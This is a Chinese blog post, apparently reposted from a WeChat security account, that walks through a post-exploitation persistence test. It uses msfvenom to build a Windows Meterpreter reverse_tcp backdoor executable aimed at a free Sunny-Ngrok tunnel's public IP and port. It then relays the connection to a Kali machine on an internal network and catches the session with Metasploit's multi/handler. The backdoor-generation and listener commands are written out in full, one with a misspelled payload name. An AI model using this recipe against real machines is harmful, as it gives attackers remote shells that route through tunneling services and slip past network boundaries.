文章前言
在后渗透阶段,权限维持也是很有意思的一个话题。其中有一个适合想我这样的穷人家的孩子利用的方法,我的宗旨是“生命不息白嫖不止”。那么我们来利用内网穿透做一次试验《白嫖之反弹shell》。
试验环境:
Windowsserver 2008 R2
Kali20.1
使用工具:
Msf
Sunny-Ngrok(工具很多这个仅供参考)
涉及资源:
https://www.ngrok.cc/
原理:
Msf生成exe后门文件,利用Sunny-Ngrok的免费内网转发,来将我们的后门反弹到本地的机子上(这里反弹到kali上)。然后本地设置监听完成一次内网穿透。
一、注册并下载Sunny-Ngrok
相信大家都能够注册这些,我比较懒就不说明了。
注册完之后 我们去开通隧道。
开通完之后我们就有一个免费的公网IP了(●ˇ∀ˇ●)嘿嘿
接下来下载客户端了我这里下载了 linux的版本 PS:因为这里我们是要将信息转发到内网的kali上
二、生成后门
命令如下:
root@kali:~#msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的公网ip LPORT=你开通隧道时设定的端口-f exe -o name.exe
三、开启监听
首先打开我们的内网转发工具
本身我已经把工具放到了kali上 我们进入工具目录
命令如下:
./sunny clientid 隧道id
现在打开我们的内网转发工具
接下来我们就该开启监听了
命令如下:
msf监听:
use exploit/multi/handler
set payload windows/meterpreter/reverset_tcp
set lhost 127.0.0.1
set lport 8000
run
所需要的配置需求如下图:
开启我们的监听
这样我们就完成了前期准备工作了。
接下来就是试验的最终目的了
四、试验结果
由于我事先把后门放到了靶机上了 我们来运行它
返回到kali上 已经得到了一个会话
成功完成一次白嫖内网转发反弹Shell。
ps:虽然做法简单,但是希望能帮助到看诸位看官们。有些截图挺模糊的深感抱歉!
本文始发于微信公众号(NOVASEC):白嫖Ngrok反弹内网shell
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论